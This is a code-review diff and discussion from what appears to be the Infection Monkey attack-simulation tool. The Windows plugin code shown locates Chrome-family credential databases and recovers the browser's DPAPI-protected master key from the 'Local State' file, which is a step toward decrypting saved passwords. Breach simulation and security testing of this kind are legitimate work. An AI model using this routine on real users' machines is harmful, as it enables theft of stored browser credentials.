monkey/agent_plugins/credentials_collectors/chrome/src/windows_credentials_database_selector.py

```diff
@@ -1,10 +1,155 @@
+            self._browsers[browser_name] = PureWindowsPath(
+                browser_directory.format(local_appdata=local_appdata)
+            )
+
+    def __call__(self) -> Set[Tuple[PureWindowsPath, Optional[bytes]]]:
+        """
+        Get browsers' credentials' database directories for current user
+        """
+
+        databases: Set[Tuple[PureWindowsPath, Optional[bytes]]] = set()
+
+        for browser_name, browser_local_data_directory_path in self._browsers.items():
+            logger.info(f'Attempting to locate credentials database for browser "{browser_name}"')
+
+            browser_databases = (
+                WindowsCredentialsDatabaseSelector._get_credentials_database_paths_for_browser(
+                    browser_local_data_directory_path
+                )
+            )
+
+            logger.info(
+                f"Found {len(browser_databases)} credentials databases "
+                f'for browser "{browser_name}"'
+            )
+
+            databases = databases.union(browser_databases)
+
+        return databases
+
+    @staticmethod
+    def _get_credentials_database_paths_for_browser(
+        browser_local_data_directory_path: PureWindowsPath,
+    ) -> Set[Tuple[PureWindowsPath, Optional[bytes]]]:
+        paths: Set[Tuple[PureWindowsPath, Optional[bytes]]] = set()
+        master_key = None
+
+        local_state_file_path = browser_local_data_directory_path / Path("Local State")
+        if not Path(local_state_file_path).exists():
+            return paths
+
+        browser_profiles = WindowsCredentialsDatabaseSelector._get_browser_profiles(
+            browser_local_data_directory_path
+        )
+
+        with open(local_state_file_path) as f:
+            try:
+                local_state_object = json.load(f)
+            except json.decoder.JSONDecodeError as err:
+                logger.error(f'Couldn\'t deserialize JSON file at "{local_state_file_path}": {err}')
+                local_state_object = {}
+
+            try:
+                # add user profiles from "Local State" file
+                browser_profiles = browser_profiles.union(
+                    set(local_state_object["profile"]["info_cache"])
+                )
+            except Exception as err:
+                logger.error(
+                    "Exception encountered while trying to load user profiles "
+                    f"from browser's local state: {err}"
+                )
+
+            try:
+                master_key = base64.b64decode(local_state_object["os_crypt"]["encrypted_key"])
+                master_key = master_key[5:]  # removing DPAPI
+                master_key = Win32CryptUnprotectData(
+                    master_key,
+                )
+            except Exception as err:
+                logger.error(
+                    "Exception encountered while trying to get master key "
+                    f"from browser's local state: {err}"
+                )
+                master_key = None
```

Comment:
All of this seems like the responsibility of the processor.

Reply:
We don't have the database files at this point. All of this logic is to select those files and pass it to the processor which will then extract the credentials from them.

Reply:
But this component doesn't need to pass the files themselves, just the paths

Reply:
We discussed on webex and what's here makes sense.